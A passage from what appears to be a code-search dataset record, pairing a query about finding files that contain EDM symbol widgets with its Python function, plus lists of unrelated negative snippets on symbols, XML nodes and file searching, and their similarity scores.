"def getMappedSymbolsXML(self, addrstring: unicode) -> unicode:\n ...", "def setSymbol(self, *args):\n return _libsbml.InitialAssignment_setSymbol(self, *args)", "def addPair(self, symbol, address):\r\n self.s_table[symbol] = address", "def update_qml(self, qml):\n if qml is None:\n return qml\n\n try:\n # parse XML\n root = ElementTree.fromstring(qml)\n\n # embed symbols\n self.embed_qml_symbols(root, 'SvgMarker', 'name')\n self.embed_qml_symbols(root, 'SVGFill', 'svgFile')\n self.embed_qml_symbols(root, 'RasterFill', 'imageFile')\n\n # return updated QML\n qml = ElementTree.tostring(\n root, encoding='utf-8', method='xml'\n )\n return qml.decode()\n except Exception as e:\n self.logger.warning(\n \"Could not embed QML symbols:\\n%s\" % e\n )\n return qml", "def add_symbol_attribute(self, symbol_attribute):\n self.symbol_attributes.append(symbol_attribute)", "def update_node(self, uri, xmlnode):\n oldnode = self.sm.get_node(uri)\n if len(oldnode) == 0: raise VOSpaceError(404, 'A Node does not exist with the requested URI.')\n oldnode = self.nf.get_node(oldnode[0]['node'])\n newnode = self.nf.get_node(xmlnode)\n # Check properties\n for property in newnode.properties:\n if property in READ_ONLY_PROPERTIES: raise VOSpaceError(401, 'User does not have permissions to set a readonly property.', summary = PERMISSION_DENIED)\n if property in oldnode.properties: \n oldnode.properties[property] = newnode.properties[property]\n else:\n oldnode.add_property(property, newnode.properties[property])\n # Delete properties if applicable\n props = xmlnode.xpath('//vos:property[@xsi:nil = \"true\"]', namespaces = {'vos': VOSPACE_NS, 'xsi': XSI_NS})\n for prop in props:\n del oldnode.properties[prop.get('uri')]\n # Store update\n self.sm.update_node(oldnode.uri, oldnode.uri, oldnode.tostring())\n return oldnode.tostring()", "def MakeSymbolName(self,content):\n return self.register(SymbolName(content,reg=self))", "def append_state_label(symbol):\n\t\tif symbol == \"c\":\n\t\t\tself.state_label = self.state_label.replace(\"o\", \"\")\n\t\tif symbol == \"d\":\n\t\t\tself.state_label = self.state_label.replace(\"k\", \"\")\n\t\telse:\n\t\t\tself.state_label += symbol", "def update_node(node, attribute, value):\n node.set(attribute, value)\n return", "def add_symbol(self):\n default_state = \"New State\"\n default_file = \"New File\"\n\n row = self.tbl_symbols.rowCount()\n self.tbl_symbols.insertRow(row)\n self.lst_state_item = QtWidgets.QTableWidgetItem(default_state)\n self.tbl_symbols.setItem(row, 0, self.lst_state_item)\n self.lst_file_item = QtWidgets.QTableWidgetItem(default_file)\n self.tbl_symbols.setItem(row, 1, self.lst_file_item)\n\n self.symbols[default_state] = default_file\n self.tbl_symbols.setCurrentItem(self.lst_file_item)\n self.load_from_list()\n self.txt_state.setFocus()", "def visit_text(self, sytext):\n self.current.update(sytext)", "def visit_text(self, sytext):\n self.current.update(sytext)", "def update(self):\n if not self._update:\n return\n\n self._update = False\n stru = self.stru\n sgn = stru.space_group().match_tabulated_settings().number()\n\n # Create the symmetry object\n symm = crystal.symmetry(\n unit_cell = self.unitcell._latpars,\n space_group_symbol = sgn\n )\n\n # Now the new structure\n newstru = stru.__class__(\n crystal_symmetry = symm,\n scatterers = stru.scatterers()\n )\n\n self.unitcell._latpars = list(newstru.unit_cell().parameters())\n\n self.stru = newstru\n return", "def write_symbol(self, new_tape_symbol: str) -> Self:\n tape_elements = list(self.tape)\n tape_elements[self.current_position] = new_tape_symbol\n return self.__class__(\n tape_elements,\n blank_symbol=self.blank_symbol,\n current_position=self.current_position,\n )", "def replace_symbols(node, symbols):\n warning = False\n\n if len(node) == 0:\n if node.text is not None and not node.text.isspace():\n if '$' in node.text and not (node.tag in EXCLUDED_TAGS):\n node.text = try_replace(node.text, symbols)\n\n if node.tag in NON_PV_TAGS:\n warning = True\n else:\n for child in node:\n if replace_symbols(child, symbols):\n warning = True\n\n return warning", "def _update_node(node, value):\n node.N += 1\n node.W += value\n node.Q = node.W / node.N", "def changeTo(self, oldSymbol, newSymbol):\n for x in range(0, len(self.tape)):\n if self.tape[x] == oldSymbol:\n self.tape[x] = newSymbol", "def __setitem__(self, key, item):\n self.attrib[key] = item", "def __setitem__(self, key, item):\n self.attrib[key] = item", "def embed_qml_symbols(self, root, layer_class, prop_key):\n for svgprop in root.findall(\".//layer[@class='%s']/prop[@k='%s']\" %\n (layer_class, prop_key)):\n symbol_path = svgprop.get('v')\n path = os.path.abspath(\n os.path.join(QGS_RESOURCES_DIR, symbol_path)\n )\n\n # NOTE: assume symbols not included in ZIP are default symbols\n if os.path.exists(path):\n try:\n # read symbol data and convert to base64\n with open(path, 'rb') as f:\n symbol_data = base64.b64encode(f.read())\n\n # embed symbol in QML\n svgprop.set('v', \"base64:%s\" % symbol_data.decode())\n self.logger.info(\"Embed symbol in QML: %s\" % symbol_path)\n except Exception as e:\n self.logger.warning(\n \"Could not embed QML symbol %s:\\n%s\" % (symbol_path, e)\n )", "def set_symbols(self, symboltable: dict):\n\n for index in range(1, self.symbol_layout.rowCount()):\n self.symbol_layout.removeRow(index)\n\n font = QFont('Fira Code', 8, QFont.Medium)\n for entry in symboltable:\n symbol = QLineEdit()\n symbol.setReadOnly(True)\n symbol.setText(entry)\n symbol.setFont(font)\n address = QLineEdit()\n address.setReadOnly(True)\n address.setFont(font)\n address.setText(str(symboltable[entry]))\n self.symbol_layout.addRow(address, symbol)", "def currency_symbol_should_change_with_currency(self, currency, symbol):\n self.change_currency(currency)\n assert self.wait_for_element(*self.CURRENCY_SYMBOL).text == symbol, \"Currency symbol haven't changed\"", "def element(self, new_element: str) -> None:\n sfac = self.shx.elem2sfac(new_element)\n if sfac == 0:\n self.shx.sfac_table.add_element(new_element)\n sfac = self.shx.elem2sfac(new_element)\n self.sfac_num = sfac", "def update(self, xact, path, msg):\n self._log.debug(\"Updating VNFR xact = %s, %s:%s\",\n xact, path, msg)\n self.regh.update_element(path, msg)\n self._log.debug(\"Updated VNFR xact = %s, %s:%s\",\n xact, path, msg)", "def _update_sym_const(self,name,G1,remove_nodes,new_inst, const_list):\n logger.debug(f\"updating symmetry block constraints of subcircuit {name}, nodes: {remove_nodes}, new name: {new_inst}\")\n if self._if_const(name):\n for const in const_list:\n if hasattr(const, 'pairs'):\n for pair in const.pairs:\n if len(pair) == 2:\n if pair[0] in remove_nodes and pair[1] in remove_nodes:\n pair[0] = new_inst\n pair.pop()\n logger.debug(f\"updated symmetric pair constraint to self symmetry:{const}\")\n elif pair[0] in remove_nodes and pair[1] not in remove_nodes:\n pair[0] = new_inst\n elif pair[1] in remove_nodes and pair[0] not in remove_nodes:\n pair[1] = new_inst\n elif len(pair) == 1:\n if pair[0] in remove_nodes:\n pair[0] = new_inst\n logger.debug(f\"updated symmetric pair constraint to self symmetry:{const}\")", "def setStruct(self, sym):\n self.sym = sym", "def add_symbol(self, symbol):\n self.symbols_list.append(symbol)\n self.symbols_list.sort()", "def update(self, opponent_action, player_action):\n\n self.root = self.root.make_updated_node(player_action, opponent_action)", "async def on_symbol_specification_updated(self, specification: MetatraderSymbolSpecification):\n for i in range(len(self._specifications)):\n if self._specifications[i]['symbol'] == specification['symbol']:\n self._specifications[i] = specification\n break\n else:\n self._specifications.append(specification)\n self._specificationsBySymbol[specification['symbol']] = specification", "def add(self, symbol, value):\n if symbol in self.symbol_map:\n raise ValueError(f\"symbol {symbol} already exists in map.\")\n self.symbol_map[symbol] = value", "def update_holding_data(holding,new_call):\n holding_data = ET.fromstring(holding)\n location_field =holding_data.find(\".//datafield[@tag='852']\")\n location_field.set('ind1', ' ')\n call_subfield = holding_data.find(\".//datafield[@tag='852']/subfield[@code='h']\")\n call_subfield.text = new_call\n return ET.tostring(holding_data)", "def add_symbol(self, x, is_global=False):\n if is_global:\n self.global_symbols[x.name] = x\n self.global_symbols[x.name].addr = self.global_addr\n self.global_symbols[x.name].isglobal = True\n if x.type != 'procedure':\n self.global_addr += x.size\n else:\n addr = self.local_symbols_size() + self.local_param_size()\n self.symbols[-1][x.name] = x\n self.symbols[-1][x.name].addr = addr", "def updateScore(self, node, addToScore):\n currentScore = 0\n scoreString = node.attrib.get('gravityScore')\n if scoreString:\n currentScore = int(scoreString)\n \n newScore = currentScore + addToScore\n node.set(\"gravityScore\", str(newScore))", "def update(self, xact, path, msg, flags=rwdts.Flag.REPLACE):\n self._log.debug(\"Updating NSR xact = %s, %s:%s regh = %s\", xact, path, msg, self.regh)\n self.regh.update_element(path, msg, flags)\n self._log.debug(\"Updated NSR xact = %s, %s:%s\", xact, path, msg)", "def update_board(self, symbol, modified_squares):\n\t\tfor coord in modified_squares:\n\t\t\tself.board[coord] = symbol", "def change_track_name(node, driver):\n module_node = node.find(\"./attstr[@name='name']\")\n module_node.set(\"val\", driver)", "def render_symbol(self, name, x, y, *layers, **kw):\n if name not in self._symbols:\n ox,oy = x,y\n x,y = self.cancoords(x, y)\n sym = _Symbol(self, name, x, y, *layers, **kw)\n key = sym.sym.k.get(self._key, \"noname\")\n self._symbols[key].append(sym)\n return sym.sym\n else:\n return None", "def _store_event(self, event):\n symbol = event.symbol\n self.symbol[symbol][\"close\"] = event.close_price\n self.symbol[symbol][\"adj_close\"] = event.adj_close_price\n self.symbol[symbol][\"timestamp\"] = event.time", "def xmlWrite(self, xmlWriter, font, value, name, attrs):\n raise NotImplementedError(self)", "def test_symbol(self, data, symbol_first, symbol_second):\n layer = Points(data)\n assert layer.symbol == \"disc\"\n\n layer.symbol = symbol_first\n assert layer.symbol == symbol_first\n\n layer = Points(data, symbol=symbol_first)\n assert layer.symbol == symbol_first\n\n layer.symbol = symbol_second\n assert layer.symbol == symbol_second", "def update(self, xact, path, msg):\n self._log.debug(\"Updating VLR xact = %s, %s:%s\",\n xact, path, msg)\n self.regh.update_element(path, msg)\n self._log.debug(\"Updated VLR xact = %s, %s:%s\",\n xact, path, msg)", "def drawSymbol(x,y,nsymb='circle',ucoords=1):\n if ucoords:\n dislin.rlsymb(symboldict[nsymb],x,y)\n else:\n dislin.symbol(symboldict[nsymb],x,y)", "def update_score(self, node, addToScore):\r\n current_score = 0\r\n score_string = self.parser.getAttribute(node, 'gravityScore')\r\n if score_string:\r\n current_score = int(score_string)\r\n\r\n new_score = current_score + addToScore\r\n self.parser.setAttribute(node, \"gravityScore\", str(new_score))", "def updateVar(self, id, value, type_):\n if id in self.variables:\n symbol = self.variables[id]\n symbol = sym.Symbol(id, value, type_, symbol.row, symbol.column)\n self.variables[id] = symbol\n return True", "def update_score(self, node, addToScore):\n current_score = 0\n score_string = self.parser.getAttribute(node, 'gravityScore')\n if score_string:\n current_score = int(score_string)\n\n new_score = current_score + addToScore\n self.parser.setAttribute(node, \"gravityScore\", str(new_score))", "def set_initial_symb(self, value):\n self.symb_val[0] = value", "def write(self, symFile):\n logging.debug(\"Writing Device \"+self.device.fullName)\n self.isPower = \"N\" #just keep it normal it's mostly actual\n\n if self.isPower == \"Y\":\n token = \"#\"\n else:\n token = \"\"\n\n symFile.write(\"#Generated for \" + self.device.fullName + \" package \" + str(self.device.package) + \"\\n\")\n symFile.write(\"DEF \" + self.name + \" U 0 100 Y Y \" + ( \"%d\" % self.units) \\\n + \" 0 \" + self.isPower + \"\\n\")\n #TODO give actual names to fields in syms\n symFile.write(\"F0 \\\"\" + token + \"U\\\" 0 0 0 H I C CNN\\n\")\n symFile.write(\"F1 \\\"\" + self.name + \"\\\" 0 0 0 H I C CNN \\n\")\n if self.device.package is not None:\n symFile.write(\"$FPLIST\\n\")\n symFile.write(\" \" + self.device.package + \"\\n\")\n symFile.write(\"$ENDFPLIST\\n\")\n symFile.write(\"DRAW\\n\")\n\n for symbol in self.symbols:\n symbol.write(symFile)\n\n symFile.write(\"ENDDRAW\\n\")\n symFile.write(\"ENDDEF\\n\")", "def toXML(self):\n return _libsbml.GeneralGlyph_toXML(self)", "def append(self, symbol):\n if symbol != '\"':\n self.value += symbol\n return False\n else:\n return True", "def update(self, stock_record):\n self._records[stock_record.symbol] = stock_record", "def change_pkg_name(self):\n\n sender = self.sender()\n self.change_data()\n self.full_ed_lines[7].setText(sender.text() + '_node')", "def setBitsPerSymbol(self, bits_per_symbol):\n \n self.bits_per_symbol = bits_per_symbol", "def update_simple(parent, name, value):\n element = parent.find('./' + name) \n\n if element is None:\n element = ET.SubElement(parent, name)\n element.text = value\n else:\n element.text = value", "def icon(self, new_icon):\r\n self.set({\"icon\": new_icon})", "def append(self, symbol):\n if symbol in ('.', 'e', 'E'):\n self.cast = float\n elif not (symbol.isdigit() or symbol in NumberToken.SIGN):\n self.value = self.cast(self.value)\n return True\n\n self.value += symbol\n return False", "def WriteXMLNode(self, node):\n # Mine data\n SetAttributeString(node,\"method\",self.processingMethod)\n SetAttributeString(node,\"processingLoss\",self.processingLoss)\n SetAttributeString(node,\"refiningTake\",self.refiningTake)\n \n return node", "async def on_symbol_price_updated(self, price: MetatraderSymbolPrice):\n self._pricesBySymbol[price['symbol']] = price\n positions = list(filter(lambda p: p['symbol'] == price['symbol'], self._positions))\n orders = list(filter(lambda o: o['symbol'] == price['symbol'], self._orders))\n specification = self.specification(price['symbol'])\n if specification:\n for position in positions:\n if 'unrealizedProfit' not in position or 'realizedProfit' not in position:\n position['unrealizedProfit'] = (1 if (position['type'] == 'POSITION_TYPE_BUY') else -1) * \\\n (position['currentPrice'] - position['openPrice']) * \\\n position['currentTickValue'] * position['volume'] / specification['tickSize']\n position['realizedProfit'] = position['profit'] - position['unrealizedProfit']\n new_position_price = price['bid'] if (position['type'] == 'POSITION_TYPE_BUY') else price['ask']\n is_profitable = (1 if (position['type'] == 'POSITION_TYPE_BUY') else -1) * (new_position_price -\n position['openPrice'])\n current_tick_value = price['profitTickValue'] if (is_profitable > 0) else price['lossTickValue']\n unrealized_profit = (1 if (position['type'] == 'POSITION_TYPE_BUY') else -1) * \\\n (new_position_price - position['openPrice']) * current_tick_value * position['volume'] / \\\n specification['tickSize']\n position['unrealizedProfit'] = unrealized_profit\n position['profit'] = position['unrealizedProfit'] + position['realizedProfit']\n position['currentPrice'] = new_position_price\n position['currentTickValue'] = current_tick_value\n for order in orders:\n order['currentPrice'] = price['ask'] if (order['type'] == 'ORDER_TYPE_BUY_LIMIT' or\n order['type'] == 'ORDER_TYPE_BUY_STOP' or\n order['type'] == 'ORDER_TYPE_BUY_STOP_LIMIT') else price['bid']\n if self._accountInformation:\n self._accountInformation['equity'] = self._accountInformation['balance'] + \\\n functools.reduce(lambda a, b: a + b['profit'], self._positions, 0)", "def update_node(self, node):\n return node.update()", "def update_XML(command, address, XML): \n # return value\n new_address = address\n \n # split command into list\n command_list = command.split(' ')\n command_arg = command_list[1][0:-1]\n \n # determine the appropriate action to take\n if (command_list[0] == '<DELAY') and command_arg.isdigit():\n # perform a millisecond delay\n ET.SubElement(XML, 'sleep', {'ms': str(command_arg)})\n \n elif (command_list[0] == '<ADDRESS') and (len(command_arg) == 4):\n if command_arg.startswith('0x') and \\\n pySCPI_config.is_hex(command_arg[2:]):\n # this is a satisfatory new address\n new_address = command_arg \n # end if\n \n elif (command_list[0] == '<BITRATE') and command_arg.isdigit():\n # is a good bitrate so change the bitrate\n rate_attributes = {'khz': str(command_arg)}\n ET.SubElement(XML, 'i2c_bitrate', rate_attributes)\n \n # sleep to allow the config to take effect\n ET.SubElement(XML, 'sleep', {'ms': '200'}) \n \n elif (command_list[0] == '<BITRATE'):\n # check command\n if command == '<PULLUPS ON>':\n # turn pullups on\n config_attributes = {'i2c': str(int(pySCPI_aardvark.I2C)),\n 'spi': str(int(pySCPI_aardvark.SPI)),\n 'gpio': str(int(pySCPI_aardvark.GPIO)),\n 'pullups': '1'}\n \n ET.SubElement(XML, 'configure', config_attributes)\n \n # sleep to allow the config to take effect\n ET.SubElement(XML, 'sleep', {'ms': '200'}) \n \n elif command == '<PULLUPS OFF>':\n # turn pullups off\n config_attributes = {'i2c': str(int(pySCPI_aardvark.I2C)),\n 'spi': str(int(pySCPI_aardvark.SPI)),\n 'gpio': str(int(pySCPI_aardvark.GPIO)),\n 'pullups': '0'}\n \n ET.SubElement(XML, 'configure', config_attributes)\n \n # sleep to allow the config to take effect\n ET.SubElement(XML, 'sleep', {'ms': '200'}) \n \n else:\n print '*** Invalid Pullup Command, use either '\\\n '<PULLUPS ON> or <PULLUPS OFF>'\n #end if \n \n else:\n print '*** The configuration command ' + command + 'requested is '\\\n 'not valid, refer to Read Me***'\n # end if \n \n return new_address", "def updatetree(self):\n if self.node:\n self.node.update()\n self.draw()", "def _add_chart_symbol(self, sym: str):\n return \"=\" + json.dumps({\"symbol\": sym})", "def test_modify_fact(self):\n template = self.env.find_template('template-fact')\n fact = template.assert_fact(**{'int': 1,\n 'float': 2.2,\n 'str': '4',\n 'symbol': Symbol('five'),\n 'multifield': (1, 2)})\n\n fact.modify_slots(symbol=Symbol('six'))\n self.assertEqual(fact['symbol'], Symbol('six'))", "def promote_and_split(self, new_low_symbol, new_high_symbol):\n i_new_cardinality = self.cardinality << 1\n new_low_symbol.cardinality = i_new_cardinality\n new_high_symbol.cardinality = i_new_cardinality\n\n new_low_symbol.sax_character = self.sax_character << 1\n new_high_symbol.sax_character = (self.sax_character << 1) + 1", "def patch(cls):\n cls._original_element = xml.dom.minidom.Element\n xml.dom.minidom.Element = KmlElement", "def print_symbol(texfile, name, hnumber, pname, fdoc):\n texfile.write(\n '\\\\newcommand{{\\\\{0}}}{{\\\\{1}@style{{\\\\symbol{{\"{2}}}}}}}\\n'\n .format(name, pname, hnumber)\n )\n fdoc.write(\n '\\\\symboldemo{{{0}}}{{{1}}}{{\\\\{1}}}\\n'\n .format(hnumber, name)\n )", "def extrn(self, name):\n if name in self.symbols:\n raise Redeclaration(name)\n self.symbols[name] = Symbol(name, 'extrn', None)", "def add_symbol(self, symbol: str):\n return self._call_txtrader_api('add_symbol', {'symbol': symbol})", "def toXML(self):\n return _libsbml.ReferenceGlyph_toXML(self)", "def toXML(self):\n return _libsbml.SpeciesReferenceGlyph_toXML(self)", "def symbol(self): \n return self.__symbol", "def toXML(self):\n return _libsbml.SpeciesGlyph_toXML(self)", "def write(self, symFile):\n logging.debug(\"Writing Symbol \"+self.name)\n for polygon in self.polygons:\n symFile.write(polygon.symRep())\n for wire in self.wires:\n symFile.write(wire.symRep())\n for text in self.texts:\n symFile.write(text.symRep())\n for pin in self.pins:\n symFile.write(pin.symRep())\n for circle in self.circles:\n symFile.write(circle.symRep())\n for rectangle in self.rectangles:\n symFile.write(rectangle.symRep())", "def write_close_node(self, key: int) -> None:\n self.close_nodes.append(key)", "def add_symbol_empty(self):\n if osarch_is_32_bit():\n self.add_data((\"empty symbol\", 4, (0, 0, 0, 0)))\n elif osarch_is_64_bit():\n self.add_data((\"empty symbol\", 4, (0, 0)))\n self.add_data((\"empty symbol\", PlatformVar(\"addr\"), (0, 0)))\n else:\n raise_unknown_address_size()", "def __setitem__(self, name, value):\n self.gattrs[name] = value", "def set_node_attributes(G, attr_name):\n if attr_name == 'k-index':\n core_number = nx.core_number(G)\n nx.set_node_attributes(G, core_number, name=attr_name)\n else:\n print('Unknown attribute name:', attr_name)", "def update(self, node, key, value):\n item = self._Item(key, value)\n self.update_node(node, item)", "def set_item(self, y_pos, x_pos):\n self.map[y_pos][x_pos] = 'X'", "def update(self, x):\n pass", "def update_mfg_node(self):\n job_node = self.xml.tree.findall(\"Job\")[0]\n mfg_node = job_node.find(\"Manufacturing\")\n mat_node_1 = job_node.findall(\"Material\")[0]\n mat_node_pos = list(job_node).index(mat_node_1)\n mfg_node_position = list(job_node).index(mfg_node)\n\n if mat_node_pos < mfg_node_position:\n job_node.remove(mfg_node)\n job_node.insert(mat_node_pos, mfg_node)", "def setattr(self, node, attr, value):\n node.set(attr, value)", "def replace_symbol(text, replacement_text=\"\"):\n\n return __RE_SYMBOL.sub(replacement_text, text)", "def update_node(self, old_node: 'GraphNode', new_node: 'GraphNode'):\n\n self.operator.update_node(old_node, new_node)", "def saveState(self):\n e = xml.Element(self.type)\n e.attrib['lastUpdate'] = str(clock.now())\n e.attrib['name'] = self.name\n #e.attrib['status'] = ('true' if self.status else 'false')\n return e", "def fl_add_symbol(symbname, pyfn_DrawPtr, scalable):\n #FL_DRAWPTR = cty.CFUNCTYPE(None, xfdata.FL_Coord, xfdata.FL_Coord,\n # xfdata.FL_Coord, FL_Coord, cty.c_int, FL_COLOR)\n _fl_add_symbol = library.cfuncproto(\n library.load_so_libforms(), \"fl_add_symbol\",\\\n cty.c_int, [xfdata.STRING, xfdata.FL_DRAWPTR, cty.c_int],\\\n \"\"\"int fl_add_symbol(const char * name, FL_DRAWPTR drawit,\n int scalable)\"\"\")\n library.check_if_flinitialized()\n s_symbname = library.convert_to_bytestrc(symbname)\n i_scalable = library.convert_to_intc(scalable)\n library.verify_function_type(pyfn_DrawPtr)\n cfn_DrawPtr = xfdata.FL_DRAWPTR(pyfn_DrawPtr)\n library.keep_cfunc_refs(cfn_DrawPtr, pyfn_DrawPtr)\n library.keep_elem_refs(symbname, s_symbname, scalable, i_scalable)\n retval = _fl_add_symbol(s_symbname, cfn_DrawPtr, i_scalable)\n return retval" ]
[ "0.617891", "0.61759514", "0.61127055", "0.5838499", "0.56468177", "0.56205124", "0.5558976", "0.5554636", "0.5539334", "0.5484995", "0.54771584", "0.5455788", "0.54166734", "0.53877443", "0.5364725", "0.53485316", "0.5334409", "0.5323229", "0.53168017", "0.5301254", "0.5126751", "0.51247275", "0.51015574", "0.5095295", "0.5082515", "0.50778973", "0.50778973", "0.5067637", "0.5064078", "0.50617194", "0.5060727", "0.50438625", "0.5030832", "0.5030832", "0.50121754", "0.5004693", "0.50034344", "0.5002075", "0.49981758", "0.4988749", "0.49863988", "0.49773294", "0.49665412", "0.4954692", "0.49483123", "0.49481803", "0.494062", "0.4923755", "0.49154726", "0.4886663", "0.4879149", "0.48684466", "0.48616505", "0.48438454", "0.48332715", "0.4821317", "0.48192638", "0.48183995", "0.4814856", "0.48133808", "0.48079962", "0.47846085", "0.47692698", "0.47626922", "0.4759726", "0.47512788", "0.47485152", "0.47471276", "0.4742544", "0.47311044", "0.47281867", "0.4718501", "0.4713663", "0.47119343", "0.4710982", "0.4693725", "0.46907246", "0.4688607", "0.4671815", "0.46678507", "0.46675488", "0.4661391", "0.46539855", "0.465285", "0.46493897", "0.46446896", "0.46434122", "0.46215636", "0.46196762", "0.46185875", "0.4617334", "0.4614899", "0.461085", "0.4607651", "0.46033838", "0.46005672", "0.4599089", "0.4595244", "0.45951453", "0.4591599" ]
0.65849906
0
Grep on the basepath to find all files that contain an EDM symbol widget. control
def build_filelist(basepath): log.info("Building list of files containing EDM symbols in %s", basepath) symbol_files = [] for dir_path, _, filenames in os.walk(basepath): for filename in filenames: filepath = os.path.join(dir_path, filename) if filename.endswith(".opi") and utils.grep(filepath, "EDM Symbol"): symbol_files.append(filepath) return symbol_files
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def searchfiles(pattern='C:\\\\RoboDK\\\\Library\\\\*.rdk'):\n import glob\n return glob.glob(pattern)", "def find_files(config, slot='*'):\n f_pattern = os.path.join(os.path.join(config['path'],config['led_name']), slot+'*' + config['led_name'] + '*'\n + config['current'] + '*' + config['exp_time'] + '*'\n + config['xpos'] + '*' + config['ypos'] + '*')\n print(f_pattern)\n return glob.glob(f_pattern)", "def find_dcds(src):\n\n dcd_paths = []\n\n for root, dirs, files in os.walk(src):\n for filename in files:\n if filename.endswith(\".dcd\"):\n dcd_paths.append(os.path.join(root, filename))\n\n return dcd_paths", "def __searchFiles(self):\n self.ui.showFindFilesDialog(self.textForFind())", "def findFiles(self):\n\n with open('analysis_result/firmwalkerOutput.txt', 'r') as firmwalker:\n for line in firmwalker:\n if line.startswith('##################################### ssh'):\n self.ssh = next(firmwalker).strip('d/').strip('\\n')\n elif line.startswith('##################################### dropbear'):\n self.dropbear = next(firmwalker).strip('d/').strip('\\n')\n elif line.startswith('##################################### busybox'):\n self.busyBox = next(firmwalker).strip('d/').strip('\\n')\n elif line.startswith('##################################### telnet'):\n self.telnet = next(firmwalker).strip('d/').strip('\\n')\n elif line.startswith('##################################### openssl'):\n self.openssl = next(firmwalker).strip('d/').strip('\\n')", "def find(pattern):\n files = config.index.files(path_glob=\"*%s*\" % pattern)\n print_files(files)", "def filesearch(word=\"\"):\n logger.info('Starting filesearch')\n file = []\n for f in glob.glob(\"*\"):\n if word[0] == \".\":\n if f.endswith(word):\n file.append(f)\n\n elif word in f:\n file.append(f)\n #return file\n logger.debug(file)\n return file", "def gen_find(filepat, top):\n for path, dir_list, file_list in os.walk(top):\n for name in fnmatch.filter(file_list, filepat):\n yield os.path.join(path, name)", "def get_available_patterns() -> list:\n path_folder = os.path.join(config.ROOT_PATH, config.FOLDER_PATTERNS)\n return [f.replace(\".cells\", \"\") for f in os.listdir(path_folder) if os.path.isfile(os.path.join(path_folder, f)) and f.endswith(\".cells\")]", "def findhtml(pathused,ticker,typ):\n\n allfiles = [] # initializing the return list\n pathused += \"/\"+ticker.upper()+\"/\"+typ # since SEC_edgar has a standard way to store files as its the Ticker and inside \n # sec-edgar-filings ==> AAPL ==> 10-K \n \n for r,d,f in os.walk(pathused): # os.walk will return all the files inside the directory (with absolute path)\n # r is the absolute path\n # f is list of files in the folders\n \n if 'filing-details.html' in f: # if filing.html (SEC-edgar convention to name html files) is in this folder \n pathfol = r.replace(\"\\\\\",\"/\") # we modify it \n allfiles.append(pathfol+'/filing-details.html') # we append the absolute path\n else:\n continue\n return allfiles #and return it", "def full_find(self, file, version):\n matches = []\n for root, dirnames, filenames in os.walk(self.checkout_path(version)):\n for filename in fnmatch.filter(filenames, file):\n matches.append(os.path.join(root, filename))\n return matches", "def find_files(basedir, regexp):\n regexp = re.compile(regexp)\n return sorted(fn for fn in glob.glob(os.path.join(basedir, '**'),\n recursive=True)\n if regexp.match(fn))", "def find_define_file_uses(self):\n # Executing git grep is substantially faster than using the define_re\n # directly on the contents of the file in Python.\n for define_file in self.get_checked_define_files():\n excluded_files = set([define_file])\n excluded_files.update(define_file.get_included_files(recursive=True))\n all_defines = define_file.get_declared_defines()\n args = ['git', 'grep', '-zwIF']\n for define in all_defines:\n args.extend(['-e', define])\n args.extend(['--', '*.cpp', '*.c', '*.cu', '*.h', '*.cuh'])\n define_re = r'\\b(?:' + '|'.join(all_defines)+ r')\\b'\n output = subprocess.check_output(args, cwd=self._source_root).decode()\n for line in output.splitlines():\n (filename, text) = line.split('\\0')\n fileobj = self._files.get(filename)\n if fileobj is not None and fileobj not in excluded_files:\n defines = re.findall(define_re, text)\n fileobj.add_used_defines(define_file, defines)", "def find_package_data(module, path):\n files = []\n exclude = re.compile(\"\\.pyc$|~$\")\n for dirpath, dirnames, filenames in os.walk(os.path.join(module,path)):\n for filename in filenames:\n if not exclude.search(filename):\n files.append(os.path.relpath(os.path.join(dirpath,filename),module))\n return {module:files}", "def find_modules(x):\n return Path(x).rglob('*.py')", "def _FindKeyFiles(self):\r\n \r\n if self.__fCachedFiles is not None:\r\n return self.__fCachedFiles\r\n \r\n app = wingapi.gApplication\r\n proj = app.GetProject()\r\n files = proj.GetAllFiles()\r\n manage_files = []\r\n settings_files = []\r\n for fn in files:\r\n if os.path.basename(fn) == 'manage.py' and not os.path.dirname(fn).endswith('project_template') and os.path.isfile(fn):\r\n manage_files.append(fn)\r\n elif os.path.basename(fn) == 'settings.py' and not os.path.dirname(fn).endswith('project_template') and os.path.isfile(fn):\r\n settings_files.append(fn)\r\n\r\n pairs = []\r\n for manage_file in manage_files:\r\n for settings_file in settings_files:\r\n manage_dir = os.path.dirname(manage_file)\r\n settings_dir = os.path.dirname(settings_file)\r\n if manage_dir == settings_dir:\r\n pairs.append((manage_file, settings_file))\r\n if len(pairs) > 1:\r\n app.SetStatusMessage(\"Warning: Multiple manage.py/settings.py pairs found in project\")\r\n \r\n if len(pairs) > 0:\r\n self.__fCachedFiles = pairs[0]\r\n else:\r\n self.__fCachedFiles = (None, None)\r\n \r\n return self.__fCachedFiles", "def get_drawings(folder):\n # case insensitive in windows system, so \"dwg\" is ok\n return sorted(Path(folder).glob('**/*.dwg'))", "def _findfile(self,path,label):\n files=[];filenames=os.listdir(path)\n for name in filenames:\n if os.path.splitext(name)[0]==str(label):\n files.append(name)\n return files", "def _find_virtual_namespaces(pkg_roots: Dict[str, str]) -> Iterator[str]:\n for pkg in pkg_roots:\n if \".\" not in pkg:\n continue\n parts = pkg.split(\".\")\n for i in range(len(parts) - 1, 0, -1):\n partial_name = \".\".join(parts[:i])\n path = Path(find_package_path(partial_name, pkg_roots, \"\"))\n if not path.exists() or partial_name not in pkg_roots:\n # partial_name not in pkg_roots ==> purposefully/accidentally skipped\n yield partial_name", "def scan(self, base: str, pattern: str):\n for t in glob.iglob(os.path.join(base, pattern), recursive=True):\n self.report(t)", "def __searchOpenFiles(self):\n self.ui.showFindFilesDialog(self.textForFind(), openFiles=True)", "def locate_scripts():\n scripts = []\n bin_dir = os.path.join(os.getcwd(), 'bin')\n if not os.path.isdir(bin_dir):\n return scripts\n for item in os.listdir(bin_dir):\n full_path = os.path.join(bin_dir, item)\n if os.path.isfile(full_path):\n with open(full_path) as f:\n first_line = next(f)\n if first_line.startswith('#!'):\n scripts.append(full_path)\n return scripts", "def findMayaFiles(directory):\n\n pass", "def _GetFontFiles(path):\n return [f for f in listdir(path)\n if os.path.splitext(f)[1] in ('.ttf', '.otf')]", "def find_commands(management_dir):\n command_dir = os.path.join(management_dir, 'commands')\n try:\n return [filename[:-3] for filename in os.listdir(command_dir)\n if not filename.startswith('_') and filename.endswith('.py')]\n except OSError:\n return []", "def find_stub_files(name: str) -> List[str]:\n result = []\n for root, dirs, files in os.walk(name):\n for file in files:\n if file.endswith(\".pyi\"):\n if os.path.sep in root:\n sub_root = root.split(os.path.sep, 1)[-1]\n file = 